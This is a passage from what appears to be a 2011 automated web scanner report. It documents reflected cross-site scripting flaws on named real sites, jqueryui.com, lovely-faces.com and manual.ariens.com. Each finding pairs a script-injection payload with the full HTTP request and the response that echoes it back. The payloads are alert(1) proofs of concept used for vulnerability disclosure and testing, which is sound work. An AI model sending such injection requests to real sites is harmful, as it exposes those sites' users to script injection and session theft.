hadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 22:51:40 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120095
The value of the iconColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7a592"><script>alert(1)</script>edb7195d969 was submitted in the iconColorDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=C14D1A&bgTextureHeader=02_glass.png&bgImgOpacityHeader=50&borderColorHeader=5E260F&fcHeader=ffffff&iconColorHeader=F1B50F&bgColorContent=2E1D1D&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=10&borderColorContent=5E260F&fcContent=ffffff&iconColorContent=222222&bgColorDefault=ffffff&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=5E260F&fcDefault=5E260F&iconColorDefault=8888887a592"><script>alert(1)</script>edb7195d969&bgColorHover=F1B50F&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=5E260F&fcHover=212121&iconColorHover=454545&bgColorActive=C7842D&bgTextureActive=01_flat.png&bgImgOpacityActive=65&borderColorActive=5E260F&fcActive=212121&iconColorActive=454545&bgColorHighlight=64A3D3&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 05 Feb 2011 22:51:47 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 1 Content-Length: 120095
The value of the iconColorError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b01e6"><script>alert(1)</script>0f6b126416c was submitted in the iconColorError parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=C14D1A&bgTextureHeader=02_glass.png&bgImgOpacityHeader=50&borderColorHeader=5E260F&fcHeader=ffffff&iconColorHeader=F1B50F&bgColorContent=2E1D1D&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=10&borderColorContent=5E260F&fcContent=ffffff&iconColorContent=222222&bgColorDefault=ffffff&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=5E260F&fcDefault=5E260F&iconColorDefault=888888&bgColorHover=F1B50F&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=5E260F&fcHover=212121&iconColorHover=454545&bgColorActive=C7842D&bgTextureActive=01_flat.png&bgImgOpacityActive=65&borderColorActive=5E260F&fcActive=212121&iconColorActive=454545&bgColorHighlight=64A3D3&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0ab01e6"><script>alert(1)</script>0f6b126416c&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 05 Feb 2011 22:52:18 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 1 Content-Length: 120095
The value of the iconColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c3f40"><script>alert(1)</script>b5efdf2fccd was submitted in the iconColorHeader parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=C14D1A&bgTextureHeader=02_glass.png&bgImgOpacityHeader=50&borderColorHeader=5E260F&fcHeader=ffffff&iconColorHeader=F1B50Fc3f40"><script>alert(1)</script>b5efdf2fccd&bgColorContent=2E1D1D&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=10&borderColorContent=5E260F&fcContent=ffffff&iconColorContent=222222&bgColorDefault=ffffff&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=5E260F&fcDefault=5E260F&iconColorDefault=888888&bgColorHover=F1B50F&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=5E260F&fcHover=212121&iconColorHover=454545&bgColorActive=C7842D&bgTextureActive=01_flat.png&bgImgOpacityActive=65&borderColorActive=5E260F&fcActive=212121&iconColorActive=454545&bgColorHighlight=64A3D3&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 05 Feb 2011 22:51:33 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 1 Content-Length: 120095
The value of the iconColorHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8fd6e"><script>alert(1)</script>adbb59b0eda was submitted in the iconColorHighlight parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=C14D1A&bgTextureHeader=02_glass.png&bgImgOpacityHeader=50&borderColorHeader=5E260F&fcHeader=ffffff&iconColorHeader=F1B50F&bgColorContent=2E1D1D&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=10&borderColorContent=5E260F&fcContent=ffffff&iconColorContent=222222&bgColorDefault=ffffff&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=5E260F&fcDefault=5E260F&iconColorDefault=888888&bgColorHover=F1B50F&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=5E260F&fcHover=212121&iconColorHover=454545&bgColorActive=C7842D&bgTextureActive=01_flat.png&bgImgOpacityActive=65&borderColorActive=5E260F&fcActive=212121&iconColorActive=454545&bgColorHighlight=64A3D3&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff8fd6e"><script>alert(1)</script>adbb59b0eda&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 05 Feb 2011 22:52:12 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 1 Content-Length: 120095
The value of the iconColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 75e02"><script>alert(1)</script>7ea5a831bc2 was submitted in the iconColorHover parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=C14D1A&bgTextureHeader=02_glass.png&bgImgOpacityHeader=50&borderColorHeader=5E260F&fcHeader=ffffff&iconColorHeader=F1B50F&bgColorContent=2E1D1D&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=10&borderColorContent=5E260F&fcContent=ffffff&iconColorContent=222222&bgColorDefault=ffffff&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=5E260F&fcDefault=5E260F&iconColorDefault=888888&bgColorHover=F1B50F&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=5E260F&fcHover=212121&iconColorHover=45454575e02"><script>alert(1)</script>7ea5a831bc2&bgColorActive=C7842D&bgTextureActive=01_flat.png&bgImgOpacityActive=65&borderColorActive=5E260F&fcActive=212121&iconColorActive=454545&bgColorHighlight=64A3D3&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 05 Feb 2011 22:51:57 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 1 Content-Length: 120095
<meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" /> <meta nam ...[SNIP]... t=75&borderColorDefault=5E260F&fcDefault=5E260F&iconColorDefault=888888&bgColorHover=F1B50F&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=5E260F&fcHover=212121&iconColorHover=45454575e02"><script>alert(1)</script>7ea5a831bc2&bgColorActive=C7842D&bgTextureActive=01_flat.png&bgImgOpacityActive=65&borderColorActive=5E260F&fcActive=212121&iconColorActive=454545&bgColorHighlight=64A3D3&bgTextureHighlight=04_highlight_hard.png& ...[SNIP]...
4.125. http://jqueryui.com/themeroller/ [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://jqueryui.com
Path:
/themeroller/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cb75b"><script>alert(1)</script>4df809d7d12 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?cb75b"><script>alert(1)</script>4df809d7d12=1 HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 05 Feb 2011 22:51:10 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 1 Content-Length: 117121
The value of the offsetLeftShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 55af7"><script>alert(1)</script>6e5e671217c was submitted in the offsetLeftShadow parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=C14D1A&bgTextureHeader=02_glass.png&bgImgOpacityHeader=50&borderColorHeader=5E260F&fcHeader=ffffff&iconColorHeader=F1B50F&bgColorContent=2E1D1D&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=10&borderColorContent=5E260F&fcContent=ffffff&iconColorContent=222222&bgColorDefault=ffffff&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=5E260F&fcDefault=5E260F&iconColorDefault=888888&bgColorHover=F1B50F&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=5E260F&fcHover=212121&iconColorHover=454545&bgColorActive=C7842D&bgTextureActive=01_flat.png&bgImgOpacityActive=65&borderColorActive=5E260F&fcActive=212121&iconColorActive=454545&bgColorHighlight=64A3D3&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px55af7"><script>alert(1)</script>6e5e671217c&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 05 Feb 2011 22:52:32 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 1 Content-Length: 120095
The value of the offsetTopShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bb7bf"><script>alert(1)</script>22581e16a07 was submitted in the offsetTopShadow parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=C14D1A&bgTextureHeader=02_glass.png&bgImgOpacityHeader=50&borderColorHeader=5E260F&fcHeader=ffffff&iconColorHeader=F1B50F&bgColorContent=2E1D1D&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=10&borderColorContent=5E260F&fcContent=ffffff&iconColorContent=222222&bgColorDefault=ffffff&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=5E260F&fcDefault=5E260F&iconColorDefault=888888&bgColorHover=F1B50F&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=5E260F&fcHover=212121&iconColorHover=454545&bgColorActive=C7842D&bgTextureActive=01_flat.png&bgImgOpacityActive=65&borderColorActive=5E260F&fcActive=212121&iconColorActive=454545&bgColorHighlight=64A3D3&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8pxbb7bf"><script>alert(1)</script>22581e16a07&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 05 Feb 2011 22:52:31 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 1 Content-Length: 120095
The value of the opacityOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fbbb9"><script>alert(1)</script>258191088c6 was submitted in the opacityOverlay parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=C14D1A&bgTextureHeader=02_glass.png&bgImgOpacityHeader=50&borderColorHeader=5E260F&fcHeader=ffffff&iconColorHeader=F1B50F&bgColorContent=2E1D1D&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=10&borderColorContent=5E260F&fcContent=ffffff&iconColorContent=222222&bgColorDefault=ffffff&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=5E260F&fcDefault=5E260F&iconColorDefault=888888&bgColorHover=F1B50F&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=5E260F&fcHover=212121&iconColorHover=454545&bgColorActive=C7842D&bgTextureActive=01_flat.png&bgImgOpacityActive=65&borderColorActive=5E260F&fcActive=212121&iconColorActive=454545&bgColorHighlight=64A3D3&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30fbbb9"><script>alert(1)</script>258191088c6&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 05 Feb 2011 22:52:23 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 1 Content-Length: 120095
The value of the opacityShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ea8af"><script>alert(1)</script>56a1225aef2 was submitted in the opacityShadow parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=C14D1A&bgTextureHeader=02_glass.png&bgImgOpacityHeader=50&borderColorHeader=5E260F&fcHeader=ffffff&iconColorHeader=F1B50F&bgColorContent=2E1D1D&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=10&borderColorContent=5E260F&fcContent=ffffff&iconColorContent=222222&bgColorDefault=ffffff&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=5E260F&fcDefault=5E260F&iconColorDefault=888888&bgColorHover=F1B50F&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=5E260F&fcHover=212121&iconColorHover=454545&bgColorActive=C7842D&bgTextureActive=01_flat.png&bgImgOpacityActive=65&borderColorActive=5E260F&fcActive=212121&iconColorActive=454545&bgColorHighlight=64A3D3&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30ea8af"><script>alert(1)</script>56a1225aef2&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 05 Feb 2011 22:52:29 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 1 Content-Length: 120095
The value of the thicknessShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2842d"><script>alert(1)</script>afd04d43505 was submitted in the thicknessShadow parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=C14D1A&bgTextureHeader=02_glass.png&bgImgOpacityHeader=50&borderColorHeader=5E260F&fcHeader=ffffff&iconColorHeader=F1B50F&bgColorContent=2E1D1D&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=10&borderColorContent=5E260F&fcContent=ffffff&iconColorContent=222222&bgColorDefault=ffffff&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=5E260F&fcDefault=5E260F&iconColorDefault=888888&bgColorHover=F1B50F&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=5E260F&fcHover=212121&iconColorHover=454545&bgColorActive=C7842D&bgTextureActive=01_flat.png&bgImgOpacityActive=65&borderColorActive=5E260F&fcActive=212121&iconColorActive=454545&bgColorHighlight=64A3D3&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px2842d"><script>alert(1)</script>afd04d43505&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 05 Feb 2011 22:52:30 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 1 Content-Length: 120095
The value of the v_sex request parameter is copied into the HTML document as plain text between tags. The payload 4b865<script>alert(1)</script>52d4c082b37 was submitted in the v_sex parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index.php?v_sex='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000335)%3C/script%3E4b865<script>alert(1)</script>52d4c082b37&v_exp=1&v_find=1 HTTP/1.1 Accept: text/html, application/xhtml+xml, */* Accept-Language: en-US User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive Host: lovely-faces.com
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:34:20 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: private, max-age=900, pre-check=900 Vary: Accept-Encoding Set-Cookie: PHPSESSID=4mrcg2j7545a2bqs4movqpf043; path=/ Last-Modified: Sat, 05 Feb 2011 21:01:02 GMT Content-Type: text/html; charset=utf-8 Content-Length: 35297
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=U ...[SNIP]... </script>4b865<script>alert(1)</script>52d4c082b37&v_exp=1&v_geo=&v_key=&fanof=&page=0&da=0&tot=7844&last_q=0&cat=All"> ...[SNIP]...
The value of the v_sex request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 26cd3"><script>alert(1)</script>f881cc67bed was submitted in the v_sex parameter. This input was echoed as 26cd3\"><script>alert(1)</script>f881cc67bed in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index.php?v_sex=26cd3"><script>alert(1)</script>f881cc67bed&v_exp=1&v_find=1 HTTP/1.1 Accept: text/html, application/xhtml+xml, */* Accept-Language: en-US User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive Host: lovely-faces.com
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:34:19 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: private, max-age=900, pre-check=900 Vary: Accept-Encoding Set-Cookie: PHPSESSID=2ksh380kf3rbmf91c7pu1up442; path=/ Last-Modified: Sat, 05 Feb 2011 21:01:02 GMT Content-Type: text/html; charset=utf-8 Content-Length: 34131
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=U ...[SNIP]... <a class=big href="?v_find=1&v_sex=26cd3\"><script>alert(1)</script>f881cc67bed&v_exp=1&v_geo=&v_key=&fanof=&page=0&da=0&tot=7844&last_q=0&cat=All"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload fb07a<script>alert(1)</script>f1f74a3196e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /aownersfb07a<script>alert(1)</script>f1f74a3196e HTTP/1.1 Host: manual.ariens.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: Lotus-Domino/5.0.7 Date: Sat, 05 Feb 2011 21:58:38 GMT Connection: close Content-Type: text/html; charset=US-ASCII Content-Length: 346 Expires: Tue, 01 Jan 1980 06:00:00 GMT Cache-control: no-cache
<HTML> <!-- Lotus-Domino (Release 5.0.7 - March 21, 2001 on OS/400) --> <HEAD> <TITLE>Error</TITLE></HEAD> <BODY TEXT="000000"> <H1>Error 404</H1>HTTP Web Server: Couldn't find design note - aownersfb07a<script>alert(1)</script>f1f74a3196e <P> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 6e157<script>alert(1)</script>5c4cfcc19e5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /favicon.ico6e157<script>alert(1)</script>5c4cfcc19e5 HTTP/1.1 Host: manual.ariens.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
